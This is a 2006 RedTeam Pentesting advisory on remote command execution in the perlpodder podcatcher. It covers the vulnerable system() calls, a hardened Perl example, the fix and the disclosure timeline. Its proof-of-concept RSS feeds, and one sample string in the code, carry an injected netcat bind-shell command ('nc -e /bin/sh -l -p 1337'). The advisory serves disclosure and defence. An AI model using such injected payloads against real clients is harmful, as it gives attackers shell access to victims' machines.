rt-sa-2006-003.txt
Posted May 24, 2006
Authored by RedTeam Pentesting | Site redteam-pentesting.de

RedTeam identified a security flaw in perlpodder versions 0.4 and below which makes it possible for a malicious podcast server to execute arbitrary shell commands on the victim's client.

tags | exploit, arbitrary, shell
SHA-256 | d686ebd6d0f72001988dd595a3a938da6296bf4e8ed1a1d3da041456e3806d68

Advisory: Perlpodder Remote Arbitrary Command Execution

RedTeam identified a security flaw in perlpodder which makes it possible
for a malicious podcast server to execute arbitrary shell commands on
the victim's client.


Details
=======

Product: perlpodder
Affected Versions: All versions up to perlpodder-0.4
Fixed Versions: perlpodder-0.5
Vulnerability Type: Remote arbitrary command execution
Security-Risk: high
Vendor-URL: http://perlpodder.sourceforge.net/
Vendor-Status: informed, fixed
Advisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2006-003.txt
Advisory-Status: public
CVE: GENERIC-MAP-NOMATCH
CVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
============

Perlpodder is a podcatcher script written in perl. It automates
downloading podcasts.

(from perlpodder SourceForge page)

Podcasting is the distribution of multimedia files over the internet.
Normally, a server provides an RSS or Atom XML feed describing where the
multimedia files can be fetched. The client parses the feed and may then
download the desired files.


More Details
============

When perlpodder fetches a podcast, it extracts the URL of the audio file
from the XML feed the server provides and stores it in the variable
"$dlset". This variable is then interpolated into a command string that
is passed to system() in two places:

The first usage is with "echo" to log the URL (line 278):

[...]
277 # add urls to log file to mark as retrieved
278 $addurl = "echo " . $dlset . " >> $log_path ";
279 system $addurl;
[...]

The second usage is with "wget" to actually fetch the audio file (line
294):

[...]
291 # Prepair to call wget
292
293 $wget_path = "$cwd". "$datadir" ;
294 $wget_cmd = "wget --quiet --background -o /dev/null -c --tries=2
--timeout=20 --random-wait " . $dlset . " -P ".
$wget_path ;
295
296 if ($DEBUG > 0) {
297
298 print "running " . $wget_cmd . "\n" ;
299
300 }
301
302 system $wget_cmd;
[...]

Unfortunately, $dlset is never sanitized. Both calls pass a single string
to system(), which Perl hands to "/bin/sh -c" whenever the string
contains shell metacharacters. A remote server that places characters
such as ";", "&" or ">" in the enclosure URL can therefore have arbitrary
shell commands executed on the client (lines 279 and 302).
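The following is an added example, not perlpodder's own code, that puts the
vulnerable single-string system() pattern from lines 278 and 294 next to a
hardened version: a strict URL check, the list form of system() so that no
shell is involved, and plain Perl file I/O instead of "echo" for the log.
The function names, the URL pattern and the sample inputs are this example's
own assumptions; only the wget options are taken from line 294.

```perl
#!/usr/bin/perl
# Added example (not perlpodder's code): the shell-injection pattern from
# the advisory and one way to fix it. Function names, the URL pattern and
# the sample inputs below are illustrative assumptions for this example.
use strict;
use warnings;

# Constructed sample inputs: a benign enclosure URL and the advisory's PoC URL.
my $benign  = 'http://www.example.com/example.mp3';
my $hostile = 'http://www.example.com/example.mp3 >> /dev/null; nc -e /bin/sh -l -p 1337 &#';

# Vulnerable pattern (same shape as lines 278/279 of perlpodder-0.4): a single
# string handed to system() runs via "/bin/sh -c", so ';', '&', '>' and '#'
# in $dlset are interpreted by the shell. Returned instead of executed so
# that this example is safe to run.
sub vulnerable_log_command {
    my ($dlset, $log_path) = @_;
    return "echo " . $dlset . " >> $log_path";
}

# Fix 1: accept only what looks like a plain http(s) URL. The character
# classes are deliberately narrow: whitespace, quotes, ';', '|', '<', '>'
# and '#' are all outside them. Requiring the "http" prefix also means the
# value can never start with '-' and be mistaken for a wget option.
sub is_safe_url {
    my ($url) = @_;
    return $url =~ m{\Ahttps?://[A-Za-z0-9.\-]+(?::\d{1,5})?(?:/[A-Za-z0-9._~\-/%?=&+]*)?\z} ? 1 : 0;
}

# Fix 2: never hand the URL to a shell. With more than one element, the list
# form of system() executes wget directly with this argument vector; no shell
# is started, so metacharacters in $dlset reach wget literally and harmlessly.
sub build_wget_argv {
    my ($dlset, $wget_path) = @_;
    return ('wget', '--quiet', '--background', '-o', '/dev/null', '-c',
            '--tries=2', '--timeout=20', '--random-wait', $dlset, '-P', $wget_path);
}

sub fetch_url {
    my ($dlset, $wget_path) = @_;
    die "refusing suspicious URL: $dlset\n" unless is_safe_url($dlset);
    my @argv = build_wget_argv($dlset, $wget_path);
    return system(@argv);
}

# Fix 3: the "retrieved" log does not need /bin/sh at all.
sub log_url {
    my ($dlset, $log_path) = @_;
    open(my $fh, '>>', $log_path) or die "cannot open $log_path: $!";
    print {$fh} "$dlset\n";
    close($fh) or die "cannot close $log_path: $!";
    return 1;
}

# Demonstration: the benign URL is accepted, the PoC URL is rejected, and the
# command line the shell would have seen in the vulnerable version is shown.
for my $url ($benign, $hostile) {
    printf "%-7s %s\n", (is_safe_url($url) ? 'ACCEPT' : 'REJECT'), $url;
}
print "vulnerable command line: ",
      vulnerable_log_command($hostile, '/tmp/podcast.log'), "\n";
```

The check in is_safe_url is a second layer only; the fix that actually removes
the vulnerability is never building a shell command line from attacker-supplied
data, which the list form of system() and the open()/print pair achieve.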


Proof of Concept
================

A minimal malicious RSS feed, served by an attacker-controlled podcast
server, which exploits the "echo" call may look as follows:

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl"?>
<rss version="2.0">
<channel>
<title>RedTeam Pentesting Example Malicious Server Feed</title>

<item>
<enclosure url="http://www.example.com/example.mp3 >> /dev/null; nc
-e /bin/sh -l -p 1337 &#"
length="241734" type="audio/mpeg" />
</item>
</channel>
</rss>

Once this URL has been interpolated, the shell sees the command line
"echo http://www.example.com/example.mp3 >> /dev/null; nc -e /bin/sh -l
-p 1337 &# >> $log_path": the ";" terminates the echo command, netcat
then listens on TCP port 1337 on the victim's computer with /bin/sh bound
to the connection, the "&" puts it in the background, and the "#" turns
the rest of the original command line into a comment. (The "-e" option
requires a netcat build that supports it; other commands work just as
well.) This is just one example of how to exploit the vulnerability, as
arbitrary commands can be included in the URL, but it should illustrate
the point.

To exploit the "wget" call, the URL only needs a minimal adjustment; the
"#" again comments out the trailing "-P" argument of the original
command line:

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl"?>
<rss version="2.0">
<channel>
<title>RedTeam Pentesting</title>

<item>
<enclosure url="http://www.example.com/example.mp3; nc -e /bin/sh -l
-p 1337 &#"
length="241734" type="audio/mpeg" />
</item>
</channel>
</rss>


Workaround
==========

Do not use perlpodder with untrusted servers.


Fix
===

Upgrade to perlpodder-0.5 immediately[1].


Security Risk
=============

High, because arbitrary shell commands can be executed on the victim's
computer with the privileges of perlpodder (normally the user's
privileges).


History
=======

2006-05-19 Discovery of the problem
2006-05-19 Notification of the author
2006-05-21 Fixed version of perlpodder is released
2006-05-22 Email from author pointing out the release
2006-05-22 Public release of the advisory without CVE
number because of public release by the
author. CVE will be appended when available.



References
==========

[1]
http://prdownloads.sourceforge.net/perlpodder/perlpodder-0.5.tar.gz?download


RedTeam
=======

RedTeam Pentesting offers individual penetration tests (pentests)
performed by a team of specialised IT security experts. These uncover
security weaknesses in company networks so that they can be fixed
promptly.

As there are only a few experts in this field, RedTeam wants to share its
knowledge and contribute to public knowledge with research in
security-related areas. The results are made available as public security
advisories.

More information about RedTeam can be found at
http://www.redteam-pentesting.de.

--
RedTeam Pentesting Tel.: +49-(0)241-963 1300
Dennewartstr. 25-27 Fax : +49-(0)241-963 1304
52068 Aachen http://www.redteam-pentesting.de